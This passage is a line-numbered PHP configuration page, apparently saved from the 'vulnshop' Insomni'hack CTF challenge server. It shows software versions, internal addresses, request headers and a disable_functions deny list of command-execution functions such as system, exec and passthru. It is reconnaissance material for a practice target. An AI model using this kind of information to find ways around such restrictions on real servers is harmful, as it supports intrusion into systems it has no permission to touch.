rUeUhaeQaPevKzKQ3oIVTSGatcynoRl29sIkh440a8pURNoz00Ab4Ts1obxCps1FKl8k5IpKbcmsgu6nz6ETQC+iSqoKKOPmVJBmYnDjHX4EozB9s7TgwykkyYS13URAHpmstYIloOP/HEi6Wx5a4+DwSpH2V18tTyHUPm3iQeS1s09ai4/0ntVgNRQmzHTRulGwaQNnei3FgHqPcMBEJlXrNioAaE8AcupKBd7ElBu1uTxCzg+dmKB4TahiQNX/OxssAb00Uzdeci4S3FYhEQdfkWCrc1cI2K+2EDhsP1OUxZGUnOWTmcgphV0UgZ4jUR1hLlBiuJfqJpb61CXimOrq8RqiEeu6TU3iMwdzYgWhUnWHDDKr0ptLar6USqmOfYYiGMMTUN/KgziGVTo+pNJHBBfF0zVAQc6N2DUL+tcO2Yc1Rk2ss+yBmOko43yCSCljJXAWA7PD4eAt6MBy2yiNACRvVVN05t40pPLYPsT+zlRDpOLG/Jt8OSGKhmnBpivV7q/Y6JkucVgkyWKb52rVZwl0tvNDi+AzRvKjfK1Dnjvpd1FhPEc1LBVsbqENXN35cFaPY2BIVGdlWYZKqgPPj/RythNtpcNycpoOxwAae0bGwhAkAQg01cfiDWDRqZtHhCqFQ5FAtOXKXh/Yh6Ci2N5YMUDW2SHg/N3scn02N++cnMIZCBdwS9gtApRxqDc6OlzWtSrdc8cJGlzP5fzZDri1tQNixISWL/5fSQvcVzfe/wzXfSG8Kuw03pHB/t5KMik+EYJ1EC1d0zCw6fofqRI2ZJwpvyxN4uPs0q/6UR2szyESobxatf3aa7jvfrT0DGPNpYV3H3CI0BYLGllQdy7TX14rUP/zzDHpuRp0EPLnJvH68Qij/RXnyIyku5Ea+5S3NO7s01q77eMY1qqY8T7Qs+4qtq+o2UWhjZO6HuWhjJBlZXWbAHvbFSTAxqMW+RbuG3VfviAP36tshujINh6Tr3kE0BNMl5x8Qq6+mVTdwrMlzpRrGaGPzVpw9NDNFngjoFZZzRCS/FRPXHRZT31X2MgfYTQYX1WE1moaaQJfKEFTs/camkXnUwt9YtNWPiuc67VmRlb0yiRgS/cAe7is0QXuTAm9kikM2DNc5OkeGRaMU8tq0TJHbUCOtezMeRfITiSv1PLLbGE5gb/NOB/1AuR1KlLETDltidyR4XIPasyEnc6eIbRa9kfNifFeXJOAnVJBiKfFCvobcLKccLHWojHJpIPH3iXQlpoNLrdcH44sucvmQOHHjZ9rDrGdbixVmbk/XGy4mtiKuoQDjmQpFJLs6wuSZvqKmL0ky6zOZLry+420UKUaue5ooyeqy9+iopgM989cp1Dcp16bSU1tOJbyFyjedTID5wOk6OAUFFXUDKFRLkmBM3xH7fzIJwPLsxexDMWP2b8g38DqN45ywCuH0VNuv+XmjwOYCjtUakbg6AkGlNoQGBMB5A9g8hh2g7zFE2U4F35FxfHfmwwbxcz3Yl32C/oAwPwDAS6UXdpOhXPZ27Trc9R/SLTla0zzGoXl2QAexnLVZJB/CZMpV7HthfL4lJIrb54u+tdv3/rCiSbw+k88yM9ZxXgKwlHmZycq13iSr0KeMHmUZw6r1VICrLT4D5fy4wq/5DAvfjaWC9oAd9KxwTNUJynUjL+EqpwSTME1zOWMBuIxmZ7p9RCsNq+NmdxW09I1MdNkJeYZNHsIt0qKEO2Z4kvmHadS+Xqv2cqzc93rpuhdl54tg2DISuJljBW3uZjMHrAPqHOYK6zPIM23G2+14Rts4cyLbdxo3Y667UskOo/W/m/PwRhQBwZFkT2vXzDbTtLMZCyfP1155bbfDrpjKZoYH41bO+d97jmEgMPVxFMF0iHESIkiNtDhKuwV058cw0dBZNP+lFsSU/6VWf0E4P/x+IF2eJnokr4uW/2jAKPYjjRb7Cxef70c3qsCl0im1Gj/Uu2eF6sWo0rUiTQq7zS+pYjywnXYwcyOZfI4mKgHj9N2ttHqbRfSlQXhjw5XXy4S7ZbzOovkxVRsphHp8ia3HlyleZS1zHcvoVrdjuNFdEe7edGHzSbpSria/WZ3+cxYV5DCx/4w7FUfyfTW0WO+i7x2YrzKUXZFw/sut+OxJDGkHUxEZPwgCquQcIgxZR9oXekDQk8FF60bqwocupaIoEz6EmaC3C+0Ro6Wgp4eb2tpPJqN+4xXFXQ3TfUfCc5PDNnLZDpLIV1NADKyjZa87mHgmWX57bYdIfIY3pdCGf43xQUXI62kBn3fZxi4SPC8crIjDQ4yzFAaz/XcPJn7xf03VRzIB5Z7qCbBzPQi5jga2E9bCD+ELug8ficEZCk/Cmj8Ro3aLtLxDR1/QffhIHNRTUZCf+S5G7SJBp2b7G31B9+EjcVAFEInZQ2LU7jiN1zf4gu7DR+KwTvkfO9bGx6BNnEQ8XXmN5cT3fEH34SNxwN4A9dgknIEwyWNbeRTwV7WYHBVwFQfbwKb7vOUjiYAiKVT1PczXqCLD/n5UbuLcNxTKoCgExSFNmsFCHI6iJBQFnUbqqbWPHyFceDAOrC/oPpIN+FVaVLrNUa6dLPbvoEQdO4pd1OUylBVkCutsOkqosbNvwcE6qL6g+0hG3MY4ejots1pT3kE4P9QDdfuLKeDfHswD6gu6j2TF2yQcLoqEGurre9EdP1QTfmxJRdn0NlrvD+jmY69Egz+UQvxfgAEALJ4EcRDa/toAAAAASUVORK5CYII=" alt="Zend logo" /></a>
 80 | This program makes use of the Zend Scripting Language Engine:<br />Zend&nbsp;Engine&nbsp;v3.0.0,&nbsp;Copyright&nbsp;(c)&nbsp;1998-2017&nbsp;Zend&nbsp;Technologies<br />&nbsp;&nbsp;&nbsp;&nbsp;with&nbsp;Zend&nbsp;OPcache&nbsp;v7.0.27-1+ubuntu16.04.1+deb.sury.org+1,&nbsp;Copyright&nbsp;(c)&nbsp;1999-2017,&nbsp;by&nbsp;Zend&nbsp;Technologies<br /></td></tr>
 81 | </table>
 82 | <hr />
 83 | <h1>Configuration</h1>
 84 | <h2><a name="module_apache2handler">apache2handler</a></h2>
 85 | <table>
 86 | <tr><td class="e">Apache Version </td><td class="v">Apache/2.4.18 (Ubuntu) </td></tr>
 87 | <tr><td class="e">Apache API Version </td><td class="v">20120211 </td></tr>
 88 | <tr><td class="e">Server Administrator </td><td class="v">webmaster@localhost </td></tr>
 89 | <tr><td class="e">Hostname:Port </td><td class="v">ip-172-31-17-117.eu-west-1.compute.internal:80 </td></tr>
 90 | <tr><td class="e">User/Group </td><td class="v">www-data(33)/33 </td></tr>
 91 | <tr><td class="e">Max Requests </td><td class="v">Per Child: 0 - Keep Alive: on - Max Per Connection: 100 </td></tr>
 92 | <tr><td class="e">Timeouts </td><td class="v">Connection: 300 - Keep-Alive: 5 </td></tr>
 93 | <tr><td class="e">Virtual Server </td><td class="v">Yes </td></tr>
 94 | <tr><td class="e">Server Root </td><td class="v">/etc/apache2 </td></tr>
 95 | <tr><td class="e">Loaded Modules </td><td class="v">core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php7 mod_proxy mod_proxy_fcgi mod_setenvif mod_status </td></tr>
 96 | </table>
 97 | <table>
 98 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
 99 | <tr><td class="e">engine</td><td class="v">1</td><td class="v">1</td></tr>
100 | <tr><td class="e">last_modified</td><td class="v">0</td><td class="v">0</td></tr>
101 | <tr><td class="e">xbithack</td><td class="v">0</td><td class="v">0</td></tr>
102 | </table>
103 | <h2>Apache Environment</h2>
104 | <table>
105 | <tr class="h"><th>Variable</th><th>Value</th></tr>
106 | <tr><td class="e">HTTP_REFERER </td><td class="v">http://vulnshop.teaser.insomnihack.ch/ </td></tr>
107 | <tr><td class="e">HTTP_COOKIE </td><td class="v">$Version=1; PHPSESSID=79f57mkl3eql3389n3ieef2pd3; $Path=/ </td></tr>
108 | <tr><td class="e">HTTP_CONNECTION </td><td class="v">keep-alive </td></tr>
109 | <tr><td class="e">HTTP_HOST </td><td class="v">vulnshop.teaser.insomnihack.ch </td></tr>
110 | <tr><td class="e">HTTP_USER_AGENT </td><td class="v">Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98) </td></tr>
111 | <tr><td class="e">HTTP_ACCEPT </td><td class="v">text/html,image/png,image/jpeg,image/pjpeg,image/x-xbitmap,image/svg+xml,image/gif;q=0.9,*/*;q=0.1 </td></tr>
112 | <tr><td class="e">HTTP_ACCEPT_LANGUAGE </td><td class="v">en, * </td></tr>
113 | <tr><td class="e">HTTP_ACCEPT_ENCODING </td><td class="v">gzip, identity;q=0.9 </td></tr>
114 | <tr><td class="e">PATH </td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </td></tr>
115 | <tr><td class="e">SERVER_SIGNATURE </td><td class="v">&lt;address&gt;Apache/2.4.18 (Ubuntu) Server at vulnshop.teaser.insomnihack.ch Port 80&lt;/address&gt;
116 |  </td></tr>
117 | <tr><td class="e">SERVER_SOFTWARE </td><td class="v">Apache/2.4.18 (Ubuntu) </td></tr>
118 | <tr><td class="e">SERVER_NAME </td><td class="v">vulnshop.teaser.insomnihack.ch </td></tr>
119 | <tr><td class="e">SERVER_ADDR </td><td class="v">172.31.17.117 </td></tr>
120 | <tr><td class="e">SERVER_PORT </td><td class="v">80 </td></tr>
121 | <tr><td class="e">REMOTE_ADDR </td><td class="v">128.197.15.144 </td></tr>
122 | <tr><td class="e">DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
123 | <tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
124 | <tr><td class="e">CONTEXT_PREFIX </td><td class="v"><i>no value</i> </td></tr>
125 | <tr><td class="e">CONTEXT_DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
126 | <tr><td class="e">SERVER_ADMIN </td><td class="v">webmaster@localhost </td></tr>
127 | <tr><td class="e">SCRIPT_FILENAME </td><td class="v">/var/www/html/phpinfo.php </td></tr>
128 | <tr><td class="e">REMOTE_PORT </td><td class="v">52076 </td></tr>
129 | <tr><td class="e">GATEWAY_INTERFACE </td><td class="v">CGI/1.1 </td></tr>
130 | <tr><td class="e">SERVER_PROTOCOL </td><td class="v">HTTP/1.1 </td></tr>
131 | <tr><td class="e">REQUEST_METHOD </td><td class="v">GET </td></tr>
132 | <tr><td class="e">QUERY_STRING </td><td class="v"><i>no value</i> </td></tr>
133 | <tr><td class="e">REQUEST_URI </td><td class="v">/phpinfo.php </td></tr>
134 | <tr><td class="e">SCRIPT_NAME </td><td class="v">/phpinfo.php </td></tr>
135 | </table>
136 | <h2>HTTP Headers Information</h2>
137 | <table>
138 | <tr class="h"><th colspan="2">HTTP Request Headers</th></tr>
139 | <tr><td class="e">HTTP Request </td><td class="v">GET /phpinfo.php HTTP/1.1 </td></tr>
140 | <tr><td class="e">Referer </td><td class="v">http://vulnshop.teaser.insomnihack.ch/ </td></tr>
141 | <tr><td class="e">Cookie </td><td class="v">$Version=1; PHPSESSID=79f57mkl3eql3389n3ieef2pd3; $Path=/ </td></tr>
142 | <tr><td class="e">Connection </td><td class="v">keep-alive </td></tr>
143 | <tr><td class="e">Host </td><td class="v">vulnshop.teaser.insomnihack.ch </td></tr>
144 | <tr><td class="e">User-Agent </td><td class="v">Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98) </td></tr>
145 | <tr><td class="e">Accept </td><td class="v">text/html,image/png,image/jpeg,image/pjpeg,image/x-xbitmap,image/svg+xml,image/gif;q=0.9,*/*;q=0.1 </td></tr>
146 | <tr><td class="e">Accept-Language </td><td class="v">en, * </td></tr>
147 | <tr><td class="e">Accept-Encoding </td><td class="v">gzip, identity;q=0.9 </td></tr>
148 | <tr class="h"><th colspan="2">HTTP Response Headers</th></tr>
149 | <tr><td class="e">Vary </td><td class="v">User-Agent, User-Agent </td></tr>
150 | </table>
151 | <h2><a name="module_calendar">calendar</a></h2>
152 | <table>
153 | <tr><td class="e">Calendar support </td><td class="v">enabled </td></tr>
154 | </table>
155 | <h2><a name="module_core">Core</a></h2>
156 | <table>
157 | <tr><td class="e">PHP Version </td><td class="v">7.0.27-1+ubuntu16.04.1+deb.sury.org+1 </td></tr>
158 | </table>
159 | <table>
160 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
161 | <tr><td class="e">allow_url_fopen</td><td class="v">On</td><td class="v">On</td></tr>
162 | <tr><td class="e">allow_url_include</td><td class="v">Off</td><td class="v">Off</td></tr>
163 | <tr><td class="e">arg_separator.input</td><td class="v">&amp;</td><td class="v">&amp;</td></tr>
164 | <tr><td class="e">arg_separator.output</td><td class="v">&amp;</td><td class="v">&amp;</td></tr>
165 | <tr><td class="e">auto_append_file</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
166 | <tr><td class="e">auto_globals_jit</td><td class="v">On</td><td class="v">On</td></tr>
167 | <tr><td class="e">auto_prepend_file</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
168 | <tr><td class="e">browscap</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
169 | <tr><td class="e">default_charset</td><td class="v">UTF-8</td><td class="v">UTF-8</td></tr>
170 | <tr><td class="e">default_mimetype</td><td class="v">text/html</td><td class="v">text/html</td></tr>
171 | <tr><td class="e">disable_classes</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
172 | <tr><td class="e">disable_functions</td><td class="v">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,proc_open,system,shell_exec,exec,passthru,mail</td><td class="v">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,proc_open,system,shell_exec,exec,passthru,mail</td></tr>
173 | <tr><td class="e">display_errors</td><td class="v">On</td><td class="v">On</td></tr>
174 | <tr><td class="e">display_startup_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
175 | <tr><td class="e">doc_root</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
176 | <tr><td class="e">docref_ext</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
177 | <tr><td class="e">docref_root</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
178 | <tr><td class="e">enable_dl</td><td class="v">Off</td><td class="v">Off</td></tr>
179 | <tr><td class="e">enable_post_data_reading</td><td class="v">On</td><td class="v">On</td></tr>
180 | <tr><td class="e">error_append_string</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
181 | <tr><td class="e">error_log</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
182 | <tr><td class="e">error_prepend_string</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
183 | <tr><td class="e">error_reporting</td><td class="v">22527</td><td class="v">22527</td></tr>
184 | <tr><td class="e">exit_on_timeout</td><td class="v">Off</td><td class="v">Off</td></tr>
185 | <tr><td class="e">expose_php</td><td class="v">Off</td><td class="v">Off</td></tr>
186 | <tr><td class="e">extension_dir</td><td class="v">/usr/lib/php/20151012</td><td class="v">/usr/lib/php/20151012</td></tr>
187 | <tr><td class="e">file_uploads</td><td class="v">On</td><td class="v">On</td></tr>
188 | <tr><td class="e">highlight.comment</td><td class="v"><font style="color: #FF8000">#FF8000</font></td><td class="v"><font style="color: #FF8000">#FF8000</font></td></tr>
189 | <tr><td class="e">highlight.default</td><td class="v"><font style="color: #0000BB">#0000BB</font></td><td class="v"><font style="color: #0000BB">#0000BB</font></td></tr>
190 | <tr><td class="e">highlight.html</td><td class="v"><font style="color: #000000">#000000</font></td><td class="v"><font style="color: #000000">#000000</font></td></tr>
191 | <tr><td class="e">highlight.keyword</td><td class="v"><font style="color: #007700">#007700</font></td><td class="v"><font style="color: #007700">#007700</font></td></tr>
192 | <tr><td class="e">highlight.string</td><td class="v"><font style="color: #DD0000">#DD0000</font></td><td class="v"><font style="color: #DD0000">#DD0000</font></td></tr>
193 | <tr><td class="e">html_errors</td><td class="v">On</td><td class="v">On</td></tr>
194 | <tr><td class="e">ignore_repeated_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
195 | <tr><td class="e">ignore_repeated_source</td><td class="v">Off</td><td class="v">Off</td></tr>
196 | <tr><td class="e">ignore_user_abort</td><td class="v">Off</td><td class="v">Off</td></tr>
197 | <tr><td class="e">implicit_flush</td><td class="v">Off</td><td class="v">Off</td></tr>
198 | <tr><td class="e">include_path</td><td class="v">.:/usr/share/php</td><td class="v">.:/usr/share/php</td></tr>
199 | <tr><td class="e">input_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
200 | <tr><td class="e">internal_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
201 | <tr><td class="e">log_errors</td><td class="v">On</td><td class="v">On</td></tr>
202 | <tr><td class="e">log_errors_max_len</td><td class="v">1024</td><td class="v">1024</td></tr>
203 | <tr><td class="e">mail.add_x_header</td><td class="v">On</td><td class="v">On</td></tr>
204 | <tr><td class="e">mail.force_extra_parameters</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
205 | <tr><td class="e">mail.log</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
206 | <tr><td class="e">max_execution_time</td><td class="v">30</td><td class="v">30</td></tr>
207 | <tr><td class="e">max_file_uploads</td><td class="v">20</td><td class="v">20</td></tr>
208 | <tr><td class="e">max_input_nesting_level</td><td class="v">64</td><td class="v">64</td></tr>
209 | <tr><td class="e">max_input_time</td><td class="v">60</td><td class="v">60</td></tr>
210 | <tr><td class="e">max_input_vars</td><td class="v">1000</td><td class="v">1000</td></tr>
211 | <tr><td class="e">memory_limit</td><td class="v">128M</td><td class="v">128M</td></tr>
212 | <tr><td class="e">open_basedir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
213 | <tr><td class="e">output_buffering</td><td class="v">4096</td><td class="v">4096</td></tr>
214 | <tr><td class="e">output_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
215 | <tr><td class="e">output_handler</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
216 | <tr><td class="e">post_max_size</td><td class="v">8M</td><td class="v">8M</td></tr>
217 | <tr><td class="e">precision</td><td class="v">14</td><td class="v">14</td></tr>
218 | <tr><td class="e">realpath_cache_size</td><td class="v">4096K</td><td class="v">4096K</td></tr>
219 | <tr><td class="e">realpath_cache_ttl</td><td class="v">120</td><td class="v">120</td></tr>
220 | <tr><td class="e">register_argc_argv</td><td class="v">Off</td><td class="v">Off</td></tr>
221 | <tr><td class="e">report_memleaks</td><td class="v">On</td><td class="v">On</td></tr>
222 | <tr><td class="e">report_zend_debug</td><td class="v">On</td><td class="v">On</td></tr>
223 | <tr><td class="e">request_order</td><td class="v">GP</td><td class="v">GP</td></tr>
224 | <tr><td class="e">sendmail_from</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
225 | <tr><td class="e">sendmail_path</td><td class="v">/usr/sbin/sendmail&nbsp;-t&nbsp;-i&nbsp;</td><td class="v">/usr/sbin/sendmail&nbsp;-t&nbsp;-i&nbsp;</td></tr>
226 | <tr><td class="e">serialize_precision</td><td class="v">17</td><td class="v">17</td></tr>
227 | <tr><td class="e">short_open_tag</td><td class="v">Off</td><td class="v">Off</td></tr>
228 | <tr><td class="e">SMTP</td><td class="v">localhost</td><td class="v">localhost</td></tr>
229 | <tr><td class="e">smtp_port</td><td class="v">25</td><td class="v">25</td></tr>
230 | <tr><td class="e">sql.safe_mode</td><td class="v">Off</td><td class="v">Off</td></tr>
231 | <tr><td class="e">sys_temp_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
232 | <tr><td class="e">track_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
233 | <tr><td class="e">unserialize_callback_func</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
234 | <tr><td class="e">upload_max_filesize</td><td class="v">2M</td><td class="v">2M</td></tr>
235 | <tr><td class="e">upload_tmp_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
236 | <tr><td class="e">user_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
237 | <tr><td class="e">user_ini.cache_ttl</td><td class="v">300</td><td class="v">300</td></tr>
238 | <tr><td class="e">user_ini.filename</td><td class="v">.user.ini</td><td class="v">.user.ini</td></tr>
239 | <tr><td class="e">variables_order</td><td class="v">GPCS</td><td class="v">GPCS</td></tr>
240 | <tr><td class="e">xmlrpc_error_number</td><td class="v">0</td><td class="v">0</td></tr>
241 | <tr><td class="e">xmlrpc_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
242 | <tr><td class="e">zend.assertions</td><td class="v">-1</td><td class="v">-1</td></tr>
243 | <tr><td class="e">zend.detect_unicode</td><td class="v">On</td><td class="v">On</td></tr>
244 | <tr><td class="e">zend.enable_gc</td><td class="v">On</td><td class="v">On</td></tr>
245 | <tr><td class="e">zend.multibyte</td><td class="v">Off</td><td class="v">Off</td></tr>
246 | <tr><td class="e">zend.script_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
247 | </table>
248 | <h2><a name="module_ctype">ctype</a></h2>
249 | <table>
250 | <tr><td class="e">ctype functions </td><td class="v">enabled </td></tr>
251 | </table>
252 | <h2><a name="module_date">date</a></h2>
253 | <table>
254 | <tr><td class="e">date/time support </td><td class="v">enabled </td></tr>
255 | <tr><td class="e">timelib version </td><td class="v">2016.02 </td></tr>
256 | <tr><td class="e">&quot;Olson&quot; Timezone Database Version </td><td class="v">0.system </td></tr>
257 | <tr><td class="e">Timezone Database </td><td class="v">internal </td></tr>
258 | <tr><td class="e">Default timezone </td><td class="v">UTC </td></tr>
259 | </table>
260 | <table>
261 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
262 | <tr><td class="e">date.default_latitude</td><td class="v">31.7667</td><td class="v">31.7667</td></tr>
263 | <tr><td class="e">date.default_longitude</td><td class="v">35.2333</td><td class="v">35.2333</td></tr>
264 | <tr><td class="e">date.sunrise_zenith</td><td class="v">90.583333</td><td class="v">90.583333</td></tr>
265 | <tr><td class="e">date.sunset_zenith</td><td class="v">90.583333</td><td class="v">90.583333</td></tr>
266 | <tr><td class="e">date.timezone</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
267 | </table>
268 | <h2><a name="module_exif">exif</a></h2>
269 | <table>
270 | <tr><td class="e">EXIF Support </td><td class="v">enabled </td></tr>
271 | <tr><td class="e">EXIF Version </td><td class="v">7.0.27-1+ubuntu16.04.1+deb.sury.org+1 </td></tr>
272 | <tr><td class="e">Supported EXIF Version </td><td class="v">0220 </td></tr>
273 | <tr><td class="e">Supported filetypes </td><td class="v">JPEG,TIFF </td></tr>
274 | </table>
275 | <table>
276 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
277 | <tr><td class="e">exif.decode_jis_intel</td><td class="v">JIS</td><td class="v">JIS</td></tr>
278 | <tr><td class="e">exif.decode_jis_motorola</td><td class="v">JIS</td><td class="v">JIS</td></tr>
279 | <tr><td class="e">exif.decode_unicode_intel</td><td class="v">UCS-2LE</td><td class="v">UCS-2LE</td></tr>
280 | <tr><td class="e">exif.decode_unicode_motorola</td><td class="v">UCS-2BE</td><td class="v">UCS-2BE</td></tr>
281 | <tr><td class="e">exif.encode_jis</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
282 | <tr><td class="e">exif.encode_unicode</td><td class="v">ISO-8859-15</td><td class="v">ISO-8859-15</td></tr>
283 | </table>
284 | <h2><a name="module_fileinfo">fileinfo</a></h2>
285 | <table>
286 | <tr><td class="e">fileinfo support </td><td class="v">enabled </td></tr>
287 | <tr><td class="e">version </td><td class="v">1.0.5 </td></tr>
288 | <tr><td class="e">libmagic </td><td class="v">522 </td></tr>
289 | </table>
290 | <h2><a name="module_filter">filter</a></h2>
291 | <table>
292 | <tr><td class="e">Input Validation and Filtering </td><td class="v">enabled </td></tr>
293 | <tr><td class="e">Revision </td><td class="v">$Id: 28fcca4bfda9c9907588a64d245b49cb398249d8 $ </td></tr>
294 | </table>
295 | <table>
296 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
297 | <tr><td class="e">filter.default</td><td class="v">unsafe_raw</td><td class="v">unsafe_raw</td></tr>
298 | <tr><td class="e">filter.default_flags</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
299 | </table>
300 | <h2><a name="module_ftp">ftp</a></h2>
301 | <table>
302 | <tr><td class="e">FTP support </td><td class="v">enabled </td></tr>
303 | <tr><td class="e">FTPS support </td><td class="v">enabled </td></tr>
304 | </table>
305 | <h2><a name="module_gettext">gettext</a></h2>
306 | <table>
307 | <tr><td class="e">GetText Support </td><td class="v">enabled </td></tr>
308 | </table>
309 | <h2><a name="module_hash">hash</a></h2>
310 | <table>
311 | <tr><td class="e">hash support </td><td class="v">enabled </td></tr>
312 | <tr><td class="e">Hashing Engines </td><td class="v">md2 md4 md5 sha1 sha224 sha256 sha384 sha512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5  </td></tr>
313 | </table>
314 | <table>
315 | <tr><td class="e">MHASH support </td><td class="v">Enabled </td></tr>
316 | <tr><td class="e">MHASH API Version </td><td class="v">Emulated Support </td></tr>
317 | </table>
318 | <h2><a name="module_iconv">iconv</a></h2>
319 | <table>
320 | <tr><td class="e">iconv support </td><td class="v">enabled </td></tr>
321 | <tr><td class="e">iconv implementation </td><td class="v">glibc </td></tr>
322 | <tr><td class="e">iconv library version </td><td class="v">2.23 </td></tr>
323 | </table>
324 | <table>
325 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
326 | <tr><td class="e">iconv.input_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
327 | <tr><td class="e">iconv.internal_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
328 | <tr><td class="e">iconv.output_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
329 | </table>
330 | <h2><a name="module_json">json</a></h2>
331 | <table>
332 | <tr><td class="e">json support </td><td class="v">enabled </td></tr>
333 | <tr><td class="e">json version </td><td class="v">1.4.0 </td></tr>
334 | </table>
335 | <h2><a name="module_libxml">libxml</a></h2>
336 | <table>
337 | <tr><td class="e">libXML support </td><td class="v">active </td></tr>
338 | <tr><td class="e">libXML Compiled Version </td><td class="v">2.9.4 </td></tr>
339 | <tr><td class="e">libXML Loaded Version </td><td class="v">20904 </td></tr>
340 | <tr><td class="e">libXML streams </td><td class="v">enabled </td></tr>
341 | </table>
342 | <h2><a name="module_openssl">openssl</a></h2>
343 | <table>
344 | <tr><td class="e">OpenSSL support </td><td class="v">enabled </td></tr>
345 | <tr><td class="e">OpenSSL Library Version </td><td class="v">OpenSSL 1.1.0g  2 Nov 2017 </td></tr>
346 | <tr><td class="e">OpenSSL Header Version </td><td class="v">OpenSSL 1.1.0g  2 Nov 2017 </td></tr>
347 | <tr><td class="e">Openssl default config </td><td class="v">/usr/lib/ssl/openssl.cnf </td></tr>
348 | </table>
349 | <table>
350 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
351 | <tr><td class="e">openssl.cafile</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
352 | <tr><td class="e">openssl.capath</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
353 | </table>
354 | <h2><a name="module_pcre">pcre</a></h2>
355 | <table>
356 | <tr><td class="e">PCRE (Perl Compatible Regular Expressions) Support </td><td class="v">enabled </td></tr>
357 | <tr><td class="e">PCRE Library Version </td><td class="v">8.41 2017-07-05 </td></tr>
358 | <tr><td class="e">PCRE JIT Support </td><td class="v">enabled </td></tr>
359 | </table>
360 | <table>
361 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
362 | <tr><td class="e">pcre.backtrack_limit</td><td class="v">1000000</td><td class="v">1000000</td></tr>
363 | <tr><td class="e">pcre.jit</td><td class="v">1</td><td class="v">1</td></tr>
364 | <tr><td class="e">pcre.recursion_limit</td><td class="v">100000</td><td class="v">100000</td></tr>
365 | </table>
366 | <h2><a name="module_pdo">PDO</a></h2>
367 | <table>
368 | <tr class="h"><th>PDO support</th><th>enabled</th></tr>
369 | <tr><td class="e">PDO drivers </td><td class="v"><i>no value</i> </td></tr>
370 | </table>
371 | <h2><a name="module_phar">Phar</a></h2>
372 | <table>
373 | <tr class="h"><th>Phar: PHP Archive support</th><th>enabled</th></tr>
